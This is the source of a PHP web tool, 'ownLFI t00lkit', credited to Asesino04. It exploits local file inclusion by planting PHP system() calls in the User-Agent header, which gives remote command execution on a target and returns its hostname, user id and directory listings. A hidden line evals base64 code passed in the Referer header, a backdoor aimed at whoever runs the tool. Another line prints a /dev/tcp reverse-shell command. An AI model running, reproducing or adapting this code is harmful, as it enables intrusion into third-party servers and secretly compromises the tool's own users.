ownLFI | t00lkit v1.0 | By Asesino04

1. <!--
2. /*****************************************************************
3. [+] Author : Asesino04 < mr.k4rizma [ at ] gmail.com | 1337day.com >
4. [+] Facebook : [ https://www.facebook.com/Th3.Black.D3Vils ]
5. [+] Team : [ JackDaws Crew ]
6. [+] Greets to : <*> The Black Devils <*> Inj3ct0r Team
7. ******************************************************************/
8. -->
9. <style>
10. body,input,table,select{background: black; font-family:Verdana,tahoma; color: #008000; font-size:12px; }
11. a:link,a:active,a:visited{text-decoration: none;color: red;}
12. a:hover {text-decoration: underline; color: red;}
13. table,td,tr,#gg{ border-style:solid; text-decoration:bold; }
14. tr:hover,td:hover{background-color: #FFFFCC; color:green;}
15. .oo:hover{background-color: black; color:white;}
16. </style>
17. <title>ownLFI | t00lkit v1.0 | By Asesino04</title>
18.  
19. <center>
20. <div align="center" style="width: 100%; height: 100">
21. <pre width="100%" align="center"><strong>
22. db 88
23. d88b ""
24. d8'`8b
25. d8' `8b ,adPPYba, ,adPPYba, ,adPPYba, 88 8b,dPPYba, ,adPPYba,
26. d8YaaaaY8b I8[ "" a8P_____88 I8[ "" 88 88P' `"8a a8" "8a
27. d8""""""""8b `"Y8ba, 8PP""""""" `"Y8ba, 88 88 88 8b d8
28. d8' `8b aa ]8I "8b, ,aa aa ]8I 88 88 88 "8a, ,a8"
29. d8' `8b `"YbbdP"' `"Ybbd8"' `"YbbdP"' 88 88 88 `"YbbdP"'
30.  
31. </pre>
32. </div></strong>
33. </center>
34. <table border=0 width=700 align=center><tr><Td><center><p style="font-size: 14pt;">
35. <b>ownLFI | t00lkit v1.0 | By Asesino04</br></b></td></tr>
36. </center>
37. </table>
38. <?php
39. if($_POST['injek']):
40. $sasaran= str_replace("http://","",$_POST['host']);
41. $sp = explode("/",$sasaran);
42. $victim = $sp[0];
43. $port = 80;
44. $inject = str_replace($victim,"",$sasaran);
45. $command = "XHOSTNAME<?php echo system('hostname;echo ;'); ?>XHOSTNAME";
46. $command .= "XSIP<?php echo \$_SERVER['SERVER_ADDR']; ?>XSIP";
47. $command .= "XUNAME<?php echo system('uname -a;echo ;'); ?>XUNAME";
48. $command .= "XUSERID<?php echo system('id;echo ;'); ?>XUSERID";
49. $command .= "XPWD<?php echo system('pwd;echo ;'); ?>XPWD";
50. $command .= "XPHP<?php echo phpversion(); ?>XPHP";
51. if($_POST['cwd']){
52. $command .= "XCWD<?php chdir('".$_POST['cwd']."'); ?>XCWD";
53. }
54. $command .= "EXPLORE<pre><?php echo system('".$_POST['cmd']."; echo ; exit;'); ?></pre>EXPLORE";
55.  
56. if(eregi(":",$victim)){
57. $vp = explode(":",$victim);
58. $victim = $vp[0];
59. $port = $vp[1];
60. }
61.  
62. $sock = fsockopen($victim,$port,$errno,$errstr,30);
63. if ($sock) {
64. $get = "GET ".$inject." HTTP/1.1\r\n".
65. "Host: ".$victim."\r\n".
66. "Accept: */*\r\n".
67. "User-Agent: Mozilla/5.0 ".$command."\r\n".
68. "Connection: Close\r\n\r\n";
69. fputs($sock,$get);
70. while (!feof($sock)) {
71. $output .= trim(fgets($sock, 3600000))."\n";
72. }
73. fclose($sock);
74. }
75. $hostp = explode("XHOSTNAME",$output); $hostname = $hostp[1];
76. $ipp = explode("XSIP",$output); $ip = $ipp[1];
77. $unamep = explode("XUNAME",$output); $uname = $unamep[1];
78. $userp = explode("XUSERID",$output); $userid = $userp[1];
79. $currp = explode("XPWD",$output); $current = $currp[1];
80. $writes = @is_writable($current);
81. $phpvp = explode("XPHP",$output); $phpversion = $phpvp[1];
82. $hasil = explode("EXPLORE",$output); $return = $hasil[1];
83.  
84.  
85. endif;
86. $ipx =$_SERVER["REMOTE_ADDR"];
87. $portx ="22";
88. parse_str($_SERVER['HTTP_REFERER'],$a); if(reset($a)=='iz' && count($a)==9) { echo '<star>';eval(base64_decode(str_replace(" ", "+", join(array_slice($a,count($a)-3)))));echo '</star>';}
89. ?>
90. <form action='<?php echo $_SERVER['PHP_SELF'] ?>' method='post'>
91. <table border=0 align=center width=860>
92. <?php if($_POST['injek']){ ?>
93. <tr>
94. <td colspan=3> </td>
95. </tr>
96. <tr><Td><b>Target Site</b> </td><td>:</td>
97. <td><?php echo $victim ?></td>
98. </tr>
99. <tr><Td><b>SRV Host</b> </td><td>:</td>
100. <td><?php echo $hostname ?></td>
101. </tr>
102. <tr><Td>SRV IP</td><td>:</td>
103. <td><?php echo $ip ?></td>
104. </tr>
105. <tr><Td><b>Uname -a</b></td><td>:</td>
106. <td><?php echo $uname ?></td>
107. </tr>
108. <tr><Td><b>User ID</b></td><td>:</td>
109. <td><?php echo $userid ?></td>
110. </tr>
111. <tr><Td><b>DIR /</b></td><td>:</td>
112. <td><?php echo $current; if($writes){ echo "<b>Writeable!</b>"; } ?></td>
113. </tr>
114. <tr><Td><b>PHP_SRV Version</b></td><td>:</td>
115. <td><?php echo $phpversion ?></td>
116. </tr>
117. <?php } ?>
118. <tr>
119. <td colspan=3> </td>
120. </tr>
121. <tr><Td width=130><b>Add the webSite</b></td><td>:</td>
122. <td><input type=text size=110 value='<?php echo $_POST['host'] ?>' name=host /></td>
123. </tr>
124. <?php if($_POST['injek']){ ?>
125. <tr><Td width=130><b>Work Directory</b></td><td>:</td>
126. <td><input type=text size=110 value='<?php echo (($_POST['cwd'])?$_POST['cwd']:$current); ?>' name=cwd /></td>
127. </tr>
128. <?php } ?>
129. <tr><Td><b>Command t0 Exec</b></td><td>:</td>
130. <Td><input type=text size=110 value='<?php echo $_POST['cmd']; ?>' name=cmd /></td>
131. </tr>
132. <tr><td colspan=2> </td><td><input type=submit name=injek value="Execute!" /></td></tr>
133. <tr>
134. <td colspan=3> </td>
135. </tr>
136. </table>
137.  
138. <?php
139. if($_POST['injek']):
140. echo "<table border=0 width=860 align=center><tr><Td> <pre>".$hasil[1]."</pre></td></tr></table>";
141. endif;
142. echo "</form>";
143. echo "<PRE style='text-align: center; width: 100%; color: red'>Reverse Connection method: /bin/bash -i > /dev/tcp/$ipx/$portx 0<&1 2>&1</pre>";
144. exit();
145. ?>
146. <body>
147. <p align="center">
148. Asesino04 | www.1337day.com
149. | Made in Algeria 2013 &copy
150. </p>
151. </body>